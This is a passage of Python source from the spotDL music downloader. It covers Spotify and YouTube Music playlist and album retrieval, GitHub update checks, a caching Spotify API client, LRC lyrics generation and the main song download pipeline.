List[str]): """ Get all songs from albums ids/urls/etc. ### Arguments - albums: List of albums ids ### Returns - List of songs """ songs: List[Song] = [] for album_id in albums: album = Album.from_url(album_id, fetch_songs=False) songs.extend([Song.from_missing_data(**song.json) for song in album.songs]) return songs def get_all_user_playlists(user_url: str = "") -> List[Playlist]: """ Get all user playlists. ### Args (optional) - user_url: Spotify user profile url. If a url is mentioned, get all public playlists of that specific user. ### Returns - List of all user playlists """ spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SpotifyError("You must be logged in to use this function") if user_url and not user_url.startswith("https://open.spotify.com/user/"): raise ValueError(f"Invalid user profile url: {user_url}") user_id = user_url.split("https://open.spotify.com/user/")[-1].replace("/", "") if user_id: user_playlists_response = spotify_client.user_playlists(user_id) else: user_playlists_response = spotify_client.current_user_playlists() user_resp = spotify_client.current_user() if user_resp is None: raise SpotifyError("Couldn't get user info") user_id = user_resp["id"] if user_playlists_response is None: raise SpotifyError("Couldn't get user playlists") user_playlists = user_playlists_response["items"] # Fetch all saved tracks while user_playlists_response and user_playlists_response["next"]: response = spotify_client.next(user_playlists_response) if response is None: break user_playlists_response = response user_playlists.extend(user_playlists_response["items"]) return [ Playlist.from_url(playlist["external_urls"]["spotify"], fetch_songs=False) for playlist in user_playlists if playlist["owner"]["id"] == user_id ] def get_user_saved_albums() -> List[Album]: """ Get all user saved albums ### Returns - List of all user saved albums """ spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SpotifyError("You must be logged in to use this function") user_saved_albums_response = spotify_client.current_user_saved_albums() if user_saved_albums_response is None: raise SpotifyError("Couldn't get user saved albums") user_saved_albums = user_saved_albums_response["items"] # Fetch all saved tracks while user_saved_albums_response and user_saved_albums_response["next"]: response = spotify_client.next(user_saved_albums_response) if response is None: break user_saved_albums_response = response user_saved_albums.extend(user_saved_albums_response["items"]) return [ Album.from_url(item["album"]["external_urls"]["spotify"], fetch_songs=False) for item in user_saved_albums ] def get_user_followed_artists() -> List[Artist]: """ Get all user playlists ### Returns - List of all user playlists """ spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SpotifyError("You must be logged in to use this function") user_followed_response = spotify_client.current_user_followed_artists() if user_followed_response is None: raise SpotifyError("Couldn't get user followed artists") user_followed_response = user_followed_response["artists"] user_followed = user_followed_response["items"] # Fetch all artists while user_followed_response and user_followed_response["next"]: response = spotify_client.next(user_followed_response) if response is None: break user_followed_response = response["artists"] user_followed.extend(user_followed_response["items"]) return [ Artist.from_url(followed_artist["external_urls"]["spotify"], fetch_songs=False) for followed_artist in user_followed ] def get_all_saved_playlists() -> List[Playlist]: """ Get all user playlists. ### Args (optional) - user_url: Spotify user profile url. If a url is mentioned, get all public playlists of that specific user. ### Returns - List of all user playlists """ spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SpotifyError("You must be logged in to use this function") user_playlists_response = spotify_client.current_user_playlists() if user_playlists_response is None: raise SpotifyError("Couldn't get user playlists") user_playlists = user_playlists_response["items"] user_id = user_playlists_response["href"].split("users/")[-1].split("/")[0] # Fetch all saved tracks while user_playlists_response and user_playlists_response["next"]: response = spotify_client.next(user_playlists_response) if response is None: break user_playlists_response = response user_playlists.extend(user_playlists_response["items"]) return [ Playlist.from_url(playlist["external_urls"]["spotify"], fetch_songs=False) for playlist in user_playlists if playlist["owner"]["id"] != user_id ] def reinit_song(song: Song) -> Song: """ Update song object with new data from Spotify ### Arguments - song: Song object ### Returns - Updated song object """ data = song.json if data.get("url"): new_data = Song.from_url(data["url"]).json elif data.get("song_id"): new_data = Song.from_url( "https://open.spotify.com/track/" + data["song_id"] ).json elif data.get("name") and data.get("artist"): new_data = Song.from_search_term(f"{data['artist']} - {data['name']}").json else: raise QueryError("Song object is missing required data to be reinitialized") for key in Song.__dataclass_fields__: # type: ignore # pylint: disable=E1101 val = data.get(key) new_val = new_data.get(key) if new_val is not None and val is None: data[key] = new_val elif new_val is not None and val is not None: data[key] = val # return reinitialized song object return Song(**data) def get_song_from_file_metadata(file: Path, id3_separator: str = "/") -> Optional[Song]: """ Get song based on the file metadata or file name ### Arguments - file: Path to file ### Returns - Song object """ file_metadata = get_file_metadata(file, id3_separator) if file_metadata is None: return None return Song.from_missing_data(**file_metadata) def gather_known_songs(output: str, output_format: str) -> Dict[str, List[Path]]: """ Gather all known songs from the output directory ### Arguments - output: Output path template - output_format: Output format ### Returns - Dictionary containing all known songs and their paths """ # Get the base directory from the path template # Path("/Music/test/{artist}/{artists} - {title}.{output-ext}") -> "/Music/test" base_dir = output.split("{", 1)[0] paths = Path(base_dir).glob(f"**/*.{output_format}") known_songs: Dict[str, List[Path]] = {} for path in paths: # Try to get the song from the metadata song = get_song_from_file_metadata(path) # If the songs doesn't have metadata, try to get it from the filename if song is None or song.url is None: search_results = get_search_results(path.stem) if len(search_results) == 0: continue song = search_results[0] known_paths = known_songs.get(song.url) if known_paths is None: known_songs[song.url] = [path] else: known_songs[song.url].append(path) return known_songs def create_ytm_album(url: str, fetch_songs: bool = True) -> Album: """ Creates a list of Song objects from an album query. ### Arguments - album_query: the url of the album ### Returns - a list of Song objects """ if "?list=" not in url or not url.startswith("https://music.youtube.com/"): raise ValueError(f"Invalid album url: {url}") browse_id = get_ytm_client().get_album_browse_id( url.split("?list=")[1].split("&")[0] ) if browse_id is None: raise ValueError(f"Invalid album url: {url}") album = get_ytm_client().get_album(browse_id) if album is None: raise ValueError(f"Couldn't fetch album: {url}") metadata = { "artist": album["artists"][0]["name"], "name": album["title"], "url": url, } songs = [] for track in album["tracks"]: artists = [artist["name"] for artist in track["artists"]] song = Song.from_missing_data( name=track["title"], artists=artists, artist=artists[0], album_name=metadata["name"], album_artist=metadata["artist"], duration=track["duration_seconds"], download_url=f"https://music.youtube.com/watch?v={track['videoId']}", ) if fetch_songs: song = Song.from_search_term(f"{song.artist} - {song.name}") songs.append(song) return Album(**metadata, songs=songs, urls=[song.url for song in songs]) def create_ytm_playlist(url: str, fetch_songs: bool = True) -> Playlist: """ Returns a playlist object from a youtube playlist url ### Arguments - url: the url of the playlist ### Returns - a Playlist object """ if not ("?list=" in url or "/browse/VLPL" in url) or not url.startswith( "https://music.youtube.com/" ): raise ValueError(f"Invalid playlist url: {url}") if "/browse/VLPL" in url: playlist_id = url.split("/browse/")[1] else: playlist_id = url.split("?list=")[1] playlist = get_ytm_client().get_playlist(playlist_id, None) # type: ignore if playlist is None: raise ValueError(f"Couldn't fetch playlist: {url}") metadata = { "description": ( playlist["description"] if playlist["description"] is not None else "" ), "author_url": ( f"https://music.youtube.com/channel/{playlist['author']['id']}" if playlist.get("author") is not None else "Missing author url" ), "author_name": ( playlist["author"]["name"] if playlist.get("author") is not None else "Missing author" ), "cover_url": ( playlist["thumbnails"][0]["url"] if playlist.get("thumbnails") is not None else "Missing thumbnails" ), "name": playlist["title"], "url": url, } songs = [] for track in playlist["tracks"]: if track["videoId"] is None or track["isAvailable"] is False: continue song = Song.from_missing_data( name=track["title"], artists=( [artist["name"] for artist in track["artists"]] if track.get("artists") is not None else [] ), artist=( track["artists"][0]["name"] if track.get("artists") is not None else None ), album_name=( track.get("album", {}).get("name") if track.get("album") is not None else None ), duration=track.get("duration_seconds"), explicit=track.get("isExplicit"), download_url=f"https://music.youtube.com/watch?v={track['videoId']}", ) if fetch_songs: song = reinit_song(song) songs.append(song) return Playlist(**metadata, songs=songs, urls=[song.url for song in songs]) File: spotdl/utils/github.py """ Module for getting information about the current version of spotdl from GitHub, downloading the latest version, and checking for updates. """ import logging import os import re from typing import Tuple import requests from spotdl import _version __all__ = [ "REPO", "WEB_APP_URL", "get_status", "check_for_updates", "get_latest_version", "create_github_url", "download_github_dir", ] REPO = "spotdl/spotify-downloader" WEB_APP_URL = "https://github.com/spotdl/web-ui/tree/master/dist" class RateLimitError(Exception): """ Raised when the GitHub API rate limit is exceeded. """ def get_status(start: str, end: str, repo: str = REPO) -> Tuple[str, int, int]: """ Get the status of a commit range. ### Arguments - start: the starting commit/branch/tag - end: the ending commit/branch/tag - repo: the repo to check (defaults to spotdl/spotify-downloader) ### Returns - tuple of (status, ahead_by, behind_by) """ url = f"https://api.github.com/repos/{repo}/compare/{start}...{end}" response = requests.get(url, timeout=10) if response.status_code != 200: if response.status_code == 403: raise RateLimitError("GitHub API rate limit exceeded.") raise RuntimeError( f"Failed to get commit count. Status code: {response.status_code}" ) data = response.json() return ( data["status"], data["ahead_by"], data["behind_by"], ) def get_latest_version(repo: str = REPO) -> str: """ Get the latest version of spotdl. ### Arguments - repo: the repo to check (defaults to spotdl/spotify-downloader) ### Returns - the latest version """ url = f"https://api.github.com/repos/{repo}/releases/latest" response = requests.get(url, timeout=10) if response.status_code != 200: if response.status_code == 403: raise RateLimitError("GitHub API rate limit exceeded.") raise RuntimeError( f"Failed to get commit count. Status code: {response.status_code}" ) data = response.json() return data["name"] # returns "vx.x.x" def check_for_updates(repo: str = REPO) -> str: """ Check for updates to the current version. ### Arguments - repo: the repo to check (defaults to spotdl/spotify-downloader) ### Returns - the latest version """ message = "" latest_version = get_latest_version(repo) current_version = f"v{_version.__version__}" # returns "vx.x.x" if latest_version != current_version: message = f"New version available: {latest_version}.\n\n" else: message = "No updates available.\n\n" try: master = get_status(current_version, "master") dev = get_status(current_version, "dev") except RuntimeError: message = "Couldn't check for updates. You might be running a dev version.\n" message += "Current version: " + current_version + "\n" message += "Latest version: " + latest_version return message except RateLimitError: message = "GitHub API rate limit exceeded. Couldn't check for updates.\n" message += "Current version: " + current_version + "\n" message += "Latest version: " + latest_version + "\n" message += "Please try again later." return message for branch in ["master", "dev"]: name = branch.capitalize() if branch == "master": status, ahead_by, behind_by = master else: status, ahead_by, behind_by = dev if status == "behind": message += f"{name} is {status} by {behind_by} commits.\n" elif status == "ahead": message += f"{name} is {status} by {ahead_by} commits.\n" else: message += f"{name} is up to date.\n" return message def create_github_url(url: str = WEB_APP_URL): """ From the given url, produce a URL that is compatible with Github's REST API. ### Arguments - url: the url to convert ### Notes - Can handle blob or tree paths. """ repo_only_url = re.compile( r"https:\/\/github\.com\/[a-z\d](?:[a-z\d]|-(?=[a-z\d])){0,38}\/[a-zA-Z0-9]+$" ) re_branch = re.compile("/(tree|blob)/(.+?)/") # Check if the given url is a url to a GitHub repo. If it is, tell the # user to use 'git clone' to download it if re.match(repo_only_url, url): raise ValueError( "The given URL is a GitHub repo. Please use 'git clone' to download it." ) # extract the branch name from the given url (e.g master) branch = re_branch.search(url) if branch: download_dirs = url[branch.end() :] api_url = ( url[: branch.start()].replace("github.com", "api.github.com/repos", 1) + "/contents/" + download_dirs + "?ref=" + branch.group(2) ) return api_url raise ValueError("The given url is not a valid GitHub url") def download_github_dir( repo_url: str = WEB_APP_URL, flatten: bool = False, output_dir: str = "./" ): """ Downloads the files and directories in repo_url. ### Arguments - repo_url: the url to the repo to download - flatten: whether to flatten the directory structure - output_dir: the directory to download the files to ### Notes - Modification of https://github.com/sdushantha/gitdir/blob/master/gitdir/gitdir.py """ # generate the url which returns the JSON data api_url = create_github_url(repo_url) dir_out = output_dir response = requests.get(api_url, timeout=10).json() if ( isinstance(response, dict) and "message" in response.keys() and "rate limit" in response["message"] ): logging.error( "You have been rate limited by Github API attempting to update web client." "Proceeding with cached web client. Please try again later." "See https://docs.github.com/en/rest/overview/resources-in-the-rest-api#rate-limiting" ) return None if not flatten: # make a directory with the name which is taken from # the actual repo os.makedirs(dir_out, exist_ok=True) if isinstance(response, dict) and response["type"] == "file": response = [response] for file in response: file_url = file["download_url"] if flatten: path = os.path.join(dir_out, os.path.basename(file["path"])) else: path = os.path.join(dir_out, file["path"]) dirname = os.path.dirname(path) if dirname != "": os.makedirs(dirname, exist_ok=True) if file_url is not None: with open(path, "wb") as new_file: new_file.write(requests.get(file_url, timeout=10).content) else: download_github_dir(file["html_url"], flatten, output_dir) return None File: spotdl/utils/spotify.py """ Module for interacting with Spotify API. To use this module, you must have a Spotify API key and Spotify API secret. ```python import spotdl.utils.spotify spotify.Spotify.init(client_id, client_secret) ``` """ import json import logging from typing import Dict, Optional import requests from spotipy import Spotify from spotipy.cache_handler import CacheFileHandler, MemoryCacheHandler from spotipy.oauth2 import SpotifyClientCredentials, SpotifyOAuth from spotdl.utils.config import get_cache_path, get_spotify_cache_path __all__ = [ "SpotifyError", "SpotifyClient", "save_spotify_cache", ] logger = logging.getLogger(__name__) class SpotifyError(Exception): """ Base class for all exceptions related to SpotifyClient. """ class Singleton(type): """ Singleton metaclass for SpotifyClient. Ensures that SpotifyClient is not instantiated without prior initialization. Every other instantiation of SpotifyClient will return the same instance. """ _instance = None def __call__(self): # pylint: disable=bad-mcs-method-argument """ Call method for Singleton metaclass. ### Returns - The instance of the SpotifyClient. """ if self._instance is None: raise SpotifyError( "Spotify client not created. Call SpotifyClient.init" "(client_id, client_secret, user_auth, cache_path, no_cache, open_browser) first." ) return self._instance def init( # pylint: disable=bad-mcs-method-argument self, client_id: str, client_secret: str, user_auth: bool = False, no_cache: bool = False, headless: bool = False, max_retries: int = 3, use_cache_file: bool = False, auth_token: Optional[str] = None, cache_path: Optional[str] = None, ) -> "Singleton": """ Initializes the SpotifyClient. ### Arguments - client_id: The client ID of the application. - client_secret: The client secret of the application. - auth_token: The access token to use. - user_auth: Whether or not to use user authentication. - cache_path: The path to the cache file. - no_cache: Whether or not to use the cache. - open_browser: Whether or not to open the browser. ### Returns - The instance of the SpotifyClient. """ # check if initialization has been completed, if yes, raise an Exception if isinstance(self._instance, self): raise SpotifyError("A spotify client has already been initialized") credential_manager = None cache_handler = ( CacheFileHandler(cache_path or get_cache_path()) if not no_cache else MemoryCacheHandler() ) # Use SpotifyOAuth as auth manager if user_auth: credential_manager = SpotifyOAuth( client_id=client_id, client_secret=client_secret, redirect_uri="http://127.0.0.1:9900/", scope="user-library-read,user-follow-read,playlist-read-private", cache_handler=cache_handler, open_browser=not headless, ) # Use SpotifyClientCredentials as auth manager else: credential_manager = SpotifyClientCredentials( client_id=client_id, client_secret=client_secret, cache_handler=cache_handler, ) if auth_token is not None: credential_manager = None self.user_auth = user_auth self.no_cache = no_cache self.max_retries = max_retries self.use_cache_file = use_cache_file # Create instance self._instance = super().__call__( auth=auth_token, auth_manager=credential_manager, status_forcelist=(429, 500, 502, 503, 504, 404), ) # Return instance return self._instance class SpotifyClient(Spotify, metaclass=Singleton): """ This is the Spotify client meant to be used in the app. Has to be initialized first by calling `SpotifyClient.init(client_id, client_secret, user_auth, cache_path, no_cache, open_browser)`. """ _initialized = False cache: Dict[str, Optional[Dict]] = {} def __init__(self, *args, **kwargs): """ Initializes the SpotifyClient. ### Arguments - auth: The access token to use. - auth_manager: The auth manager to use. """ super().__init__(*args, **kwargs) self._initialized = True use_cache_file: bool = self.use_cache_file # type: ignore # pylint: disable=E1101 cache_file_loc = get_spotify_cache_path() if use_cache_file and cache_file_loc.exists(): with open(cache_file_loc, "r", encoding="utf-8") as cache_file: self.cache = json.load(cache_file) elif use_cache_file: with open(cache_file_loc, "w", encoding="utf-8") as cache_file: json.dump(self.cache, cache_file) def _get(self, url, args=None, payload=None, **kwargs): """ Overrides the get method of the SpotifyClient. Allows us to cache requests """ use_cache = not self.no_cache # type: ignore # pylint: disable=E1101 if args: kwargs.update(args) cache_key = None if use_cache: key_obj = dict(kwargs) key_obj["url"] = url key_obj["data"] = json.dumps(payload) cache_key = json.dumps(key_obj) if cache_key is None: cache_key = url if self.cache.get(cache_key) is not None: return self.cache[cache_key] # Wrap in a try-except and retry up to `retries` times. response = None retries = self.max_retries # type: ignore # pylint: disable=E1101 while response is None: try: response = self._internal_call("GET", url, payload, kwargs) except (requests.exceptions.Timeout, requests.ConnectionError) as exc: retries -= 1 if retries <= 0: raise exc if use_cache and cache_key is not None: self.cache[cache_key] = response return response def save_spotify_cache(cache: Dict[str, Optional[Dict]]): """ Saves the Spotify cache to a file. ### Arguments - cache: The cache to save. """ cache_file_loc = get_spotify_cache_path() logger.debug("Saving Spotify cache to %s", cache_file_loc) # Only cache tracks cache = { key: value for key, value in cache.items() if value is not None and "tracks/" in key } with open(cache_file_loc, "w", encoding="utf-8") as cache_file: json.dump(cache, cache_file) File: spotdl/utils/lrc.py """ LRC related functions """ import logging import re from pathlib import Path from syncedlyrics import search as syncedlyrics_search from syncedlyrics.utils import Lyrics, TargetType, has_translation from spotdl.types.song import Song logger = logging.getLogger(__name__) __all__ = ["generate_lrc", "remomve_lrc"] def generate_lrc(song: Song, output_file: Path): """ Generates an LRC file for the current song ### Arguments - song: Song object - output_file: Path to the output file """ if song.lyrics and has_translation(song.lyrics): lrc_data = song.lyrics else: try: lrc_data = syncedlyrics_search(song.display_name) except Exception: lrc_data = None if lrc_data: Lyrics(lrc_data).save_lrc_file( str(output_file.with_suffix(".lrc")), TargetType.PREFER_SYNCED ) logger.debug("Saved lrc file for %s", song.display_name) else: logger.debug("No lrc file found for %s", song.display_name) def remomve_lrc(lyrics: str) -> str: """ Removes lrc tags from lyrics ### Arguments - lyrics: Lyrics string ### Returns - Lyrics string without lrc tags """ return re.sub(r"\[.*?\]", "", lyrics) File: spotdl/download/downloader.py """ Downloader module, this is where all the downloading pre/post processing happens etc. """ import asyncio import datetime import json import logging import re import shutil import sys import traceback from argparse import Namespace from pathlib import Path from typing import Dict, List, Optional, Tuple, Type, Union from yt_dlp.postprocessor.modify_chapters import ModifyChaptersPP from yt_dlp.postprocessor.sponsorblock import SponsorBlockPP from spotdl.download.progress_handler import ProgressHandler from spotdl.providers.audio import ( AudioProvider, BandCamp, Piped, SliderKZ, SoundCloud, YouTube, YouTubeMusic, ) from spotdl.providers.lyrics import AzLyrics, Genius, LyricsProvider, MusixMatch, Synced from spotdl.types.options import DownloaderOptionalOptions, DownloaderOptions from spotdl.types.song import Song from spotdl.utils.archive import Archive from spotdl.utils.config import ( DOWNLOADER_OPTIONS, GlobalConfig, create_settings_type, get_errors_path, get_temp_path, modernize_settings, ) from spotdl.utils.ffmpeg import FFmpegError, convert, get_ffmpeg_path from spotdl.utils.formatter import create_file_name from spotdl.utils.lrc import generate_lrc from spotdl.utils.m3u import gen_m3u_files from spotdl.utils.metadata import MetadataError, embed_metadata from spotdl.utils.search import gather_known_songs, reinit_song, songs_from_albums __all__ = [ "AUDIO_PROVIDERS", "LYRICS_PROVIDERS", "Downloader", "DownloaderError", "SPONSOR_BLOCK_CATEGORIES", ] AUDIO_PROVIDERS: Dict[str, Type[AudioProvider]] = { "youtube": YouTube, "youtube-music": YouTubeMusic, "slider-kz": SliderKZ, "soundcloud": SoundCloud, "bandcamp": BandCamp, "piped": Piped, } LYRICS_PROVIDERS: Dict[str, Type[LyricsProvider]] = { "genius": Genius, "musixmatch": MusixMatch, "azlyrics": AzLyrics, "synced": Synced, } SPONSOR_BLOCK_CATEGORIES = { "sponsor": "Sponsor", "intro": "Intermission/Intro Animation", "outro": "Endcards/Credits", "selfpromo": "Unpaid/Self Promotion", "preview": "Preview/Recap", "filler": "Filler Tangent", "interaction": "Interaction Reminder", "music_offtopic": "Non-Music Section", } logger = logging.getLogger(__name__) class DownloaderError(Exception): """ Base class for all exceptions related to downloaders. """ class Downloader: """ Downloader class, this is where all the downloading pre/post processing happens etc. It handles the downloading/moving songs, multithreading, metadata embedding etc. """ def __init__( self, settings: Optional[Union[DownloaderOptionalOptions, DownloaderOptions]] = None, loop: Optional[asyncio.AbstractEventLoop] = None, ): """ Initialize the Downloader class. ### Arguments - settings: The settings to use. - loop: The event loop to use. ### Notes - `search-query` uses the same format as `output`. - if `audio_provider` or `lyrics_provider` is a list, then if no match is found, the next provider in the list will be used. """ if settings is None: settings = {} # Create settings dictionary, fill in missing values with defaults # from spotdl.types.options.DOWNLOADER_OPTIONS self.settings: DownloaderOptions = DownloaderOptions( **create_settings_type( Namespace(config=False), dict(settings), DOWNLOADER_OPTIONS ) # type: ignore ) # Handle deprecated values in config file modernize_settings(self.settings) logger.debug("Downloader settings: %s", self.settings) # If no audio providers specified, raise an error if len(self.settings["audio_providers"]) == 0: raise DownloaderError( "No audio providers specified. Please specify at least one." ) # If ffmpeg is the default value and it's not installed # try to use the spotdl's ffmpeg self.ffmpeg = self.settings["ffmpeg"] if self.ffmpeg == "ffmpeg" and shutil.which("ffmpeg") is None: ffmpeg_exec = get_ffmpeg_path() if ffmpeg_exec is None: raise DownloaderError("ffmpeg is not installed") self.ffmpeg = str(ffmpeg_exec.absolute()) logger.debug("FFmpeg path: %s", self.ffmpeg) self.loop = loop or ( asyncio.new_event_loop() if sys.platform != "win32" else asyncio.ProactorEventLoop() # type: ignore ) if loop is None: asyncio.set_event_loop(self.loop) # semaphore is required to limit concurrent asyncio executions self.semaphore = asyncio.Semaphore(self.settings["threads"]) self.progress_handler = ProgressHandler(self.settings["simple_tui"]) # Gather already present songs self.scan_formats = self.settings["detect_formats"] or [self.settings["format"]] self.known_songs: Dict[str, List[Path]] = {} if self.settings["scan_for_songs"]: logger.info("Scanning for known songs, this might take a while...") for scan_format in self.scan_formats: logger.debug("Scanning for %s files", scan_format) found_files = gather_known_songs(self.settings["output"], scan_format) logger.debug("Found %s %s files", len(found_files), scan_format) for song_url, song_paths in found_files.items(): known_paths = self.known_songs.get(song_url) if known_paths is None: self.known_songs[song_url] = song_paths else: self.known_songs[song_url].extend(song_paths) logger.debug("Found %s known songs", len(self.known_songs)) # Initialize lyrics providers self.lyrics_providers: List[LyricsProvider] = [] for lyrics_provider in self.settings["lyrics_providers"]: lyrics_class = LYRICS_PROVIDERS.get(lyrics_provider) if lyrics_class is None: raise DownloaderError(f"Invalid lyrics provider: {lyrics_provider}") if lyrics_provider == "genius": access_token = self.settings.get("genius_token") if not access_token: raise DownloaderError("Genius token not found in settings") self.lyrics_providers.append(Genius(access_token)) else: self.lyrics_providers.append(lyrics_class()) # Initialize audio providers self.audio_providers: List[AudioProvider] = [] for audio_provider in self.settings["audio_providers"]: audio_class = AUDIO_PROVIDERS.get(audio_provider) if audio_class is None: raise DownloaderError(f"Invalid audio provider: {audio_provider}") self.audio_providers.append( audio_class( output_format=self.settings["format"], cookie_file=self.settings["cookie_file"], search_query=self.settings["search_query"], filter_results=self.settings["filter_results"], yt_dlp_args=self.settings["yt_dlp_args"], ) ) # Initialize list of errors self.errors: List[str] = [] # Initialize proxy server proxy = self.settings["proxy"] proxies = None if proxy: if not re.match( pattern=r"^(http|https):\/\/(?:(\w+)(?::(\w+))?@)?((?:\d{1,3})(?:\.\d{1,3}){3})(?::(\d{1,5}))?$", # pylint: disable=C0301 string=proxy, ): raise DownloaderError(f"Invalid proxy server: {proxy}") proxies = {"http": proxy, "https": proxy} logger.info("Setting proxy server: %s", proxy) GlobalConfig.set_parameter("proxies", proxies) # Initialize archive self.url_archive = Archive() if self.settings["archive"]: self.url_archive.load(self.settings["archive"]) logger.debug("Archive: %d urls", len(self.url_archive)) logger.debug("Downloader initialized") def download_song(self, song: Song) -> Tuple[Song, Optional[Path]]: """ Download a single song. ### Arguments - song: The song to download. ### Returns - tuple with the song and the path to the downloaded file if successful. """ self.progress_handler.set_song_count(1) results = self.download_multiple_songs([song]) return results[0] def download_multiple_songs( self, songs: List[Song] ) -> List[Tuple[Song, Optional[Path]]]: """ Download multiple songs to the temp directory. ### Arguments - songs: The songs to download. ### Returns - list of tuples with the song and the path to the downloaded file if successful. """ if self.settings["fetch_albums"]: albums = set(song.album_id for song in songs if song.album_id is not None) logger.info( "Fetching %d album%s", len(albums), "s" if len(albums) > 1 else "" ) songs.extend(songs_from_albums(list(albums))) # Remove duplicates return_obj = {} for song in songs: return_obj[song.url] = song songs = list(return_obj.values()) logger.debug("Downloading %d songs", len(songs)) if self.settings["archive"]: songs = [song for song in songs if song.url not in self.url_archive] logger.debug("Filtered %d songs with archive", len(songs)) self.progress_handler.set_song_count(len(songs)) # Create tasks list tasks = [self.pool_download(song) for song in songs] # Call all task asynchronously, and wait until all are finished results = list(self.loop.run_until_complete(asyncio.gather(*tasks))) # Print errors if self.settings["print_errors"]: for error in self.errors: logger.error(error) if self.settings["save_errors"]: with open( self.settings["save_errors"], "w", encoding="utf-8" ) as error_file: error_file.write("\n".join(self.errors)) logger.info("Saved errors to %s", self.settings["save_errors"]) # Save archive if self.settings["archive"]: for result in results: if result[1] or self.settings["add_unavailable"]: self.url_archive.add(result[0].url) self.url_archive.save(self.settings["archive"]) logger.info( "Saved archive with %d urls to %s", len(self.url_archive), self.settings["archive"], ) # Create m3u playlist if self.settings["m3u"]: song_list = [ song for song, path in results if path or self.settings["add_unavailable"] ] gen_m3u_files( song_list, self.settings["m3u"], self.settings["output"], self.settings["format"], self.settings["restrict"], False, self.settings["detect_formats"], ) # Save results to a file if self.settings["save_file"]: with open(self.settings["save_file"], "w", encoding="utf-8") as save_file: json.dump([song.json for song, _ in results], save_file, indent=4) logger.info("Saved results to %s", self.settings["save_file"]) return results async def pool_download(self, song: Song) -> Tuple[Song, Optional[Path]]: """ Run asynchronous task in a pool to make sure that all processes. ### Arguments - song: The song to download. ### Returns - tuple with the song and the path to the downloaded file if successful. ### Notes - This method calls `self.search_and_download` in a new thread. """ # tasks that cannot acquire semaphore will wait here until it's free # only certain amount of tasks can acquire the semaphore at the same time async with self.semaphore: return await self.loop.run_in_executor(None, self.search_and_download, song) def search(self, song: Song) -> str: """ Search for a song using all available providers. ### Arguments - song: The song to search for. ### Returns - tuple with download url and audio provider if successful. """ for audio_provider in self.audio_providers: url = audio_provider.search(song, self.settings["only_verified_results"]) if url: return url logger.debug("%s failed to find %s", audio_provider.name, song.display_name) raise LookupError(f"No results found for song: {song.display_name}") def search_lyrics(self, song: Song) -> Optional[str]: """ Search for lyrics using all available providers. ### Arguments - song: The song to search for. ### Returns - lyrics if successful else None. """ for lyrics_provider in self.lyrics_providers: lyrics = lyrics_provider.get_lyrics(song.name, song.artists) if lyrics: logger.debug( "Found lyrics for %s on %s", song.display_name, lyrics_provider.name ) return lyrics logger.debug( "%s failed to find lyrics for %s", lyrics_provider.name, song.display_name, ) return None def search_and_download( # pylint: disable=R0911 self, song: Song ) -> Tuple[Song, Optional[Path]]: """ Search for the song and download it. ### Arguments - song: The song to download. ### Returns - tuple with the song and the path to the downloaded file if successful. ### Notes - This function is synchronous. """ # Check if song has name/artist and url/song_id if not (song.name and (song.artists or song.artist)) and not ( song.url or song.song_id ): logger.error("Song is missing required fields: %s", song.display_name) self.errors.append(f"Song is missing required fields: {song.display_name}") return song, None reinitialized = False try: # Create the output file path output_file = create_file_name( song=song, template=self.settings["output"], file_extension=self.settings["format"], restrict=self.settings["restrict"], file_name_length=self.settings["max_filename_length"], ) except Exception: song = reinit_song(song) output_file = create_file_name( song=song, template=self.settings["output"], file_extension=self.settings["format"], restrict=self.settings["restrict"], file_name_length=self.settings["max_filename_length"], ) reinitialized = True if song.explicit is True and self.settings["skip_explicit"] is True: logger.info("Skipping explicit song: %s", song.display_name) return song, None # Initialize the progress tracker display_progress_tracker = self.progress_handler.get_new_tracker(song) try: # Create the temp folder path temp_folder = get_temp_path() # Check if there is an already existing song file, with the same spotify URL in its # metadata, but saved under a different name. If so, save its path. dup_song_paths: List[Path] = self.known_songs.get(song.url, []) # Remove files from the list that have the same path as the output file dup_song_paths = [ dup_song_path for dup_song_path in dup_song_paths if (dup_song_path.absolute() != output_file.absolute()) and dup_song_path.exists() ] file_exists = output_file.exists() or dup_song_paths if not self.settings["scan_for_songs"]: for file_extension in self.scan_formats: ext_path = output_file.with_suffix(f".{file_extension}") if ext_path.exists(): dup_song_paths.append(ext_path) if dup_song_paths: logger.debug( "Found duplicate songs for %s at %s", song.display_name, ", ".join( [f"'{str(dup_song_path)}'" for dup_song_path in dup_song_paths] ), ) # If the file already exists and we don't want to overwrite it, # we can skip the download if ( # pylint: disable=R1705 Path(str(output_file.absolute()) + ".skip").exists() and self.settings["respect_skip_file"] ): logger.info( "Skipping %s (skip file found) %s", song.display_name, "", ) return song, output_file if output_file.exists() else None elif file_exists and self.settings["overwrite"] == "skip": logger.info( "Skipping %s (file already exists) %s", song.display_name, "(duplicate)" if dup_song_paths else "", ) display_progress_tracker.notify_download_skip() return song, output_file # Check if we have all the metadata # and that the song object is not a placeholder # If it's None extract the current metadata # And reinitialize the song object # Force song reinitialization if we are fetching albums # they have most metadata but not all if ( (song.name is None and song.url) or (self.settings["fetch_albums"] and reinitialized is False) or None in [ song.genres, song.disc_count, song.tracks_count, song.track_number, song.album_id, song.album_artist, ] ): song = reinit_song(song) reinitialized = True # Don't skip if the file exists and overwrite is set to force if file_exists and self.settings["overwrite"] == "force": logger.info( "Overwriting %s %s", song.display_name, " (duplicate)" if dup_song_paths else "", ) # If the duplicate song path is not None, we can delete the old file for dup_song_path in dup_song_paths: try: logger.info("Removing duplicate file: %s", dup_song_path) dup_song_path.unlink() except (PermissionError, OSError) as exc: logger.debug( "Could not remove duplicate file: %s, error: %s", dup_song_path, exc, ) # Find song lyrics and add them to the song object try: lyrics = self.search_lyrics(song) if lyrics is None: logger.debug( "No lyrics found for %s, lyrics providers: %s", song.display_name, ", ".join( [lprovider.name for lprovider in self.lyrics_providers] ), ) else: song.lyrics = lyrics except Exception as exc: logger.debug("Could not search for lyrics: %s", exc) # If the file already exists and we want to overwrite the metadata, # we can skip the download if file_exists and self.settings["overwrite"] == "metadata": most_recent_duplicate: Optional[Path] = None if dup_song_paths: # Get the most recent duplicate song path and remove the rest most_recent_duplicate = max( dup_song_paths, key=lambda dup_song_path: dup_song_path.stat().st_mtime and dup_song_path.suffix == output_file.suffix, ) # Remove the rest of the duplicate song paths for old_song_path in dup_song_paths: if most_recent_duplicate == old_song_path: continue try: logger.info("Removing duplicate file: %s", old_song_path) old_song_path.unlink() except (PermissionError, OSError) as exc: 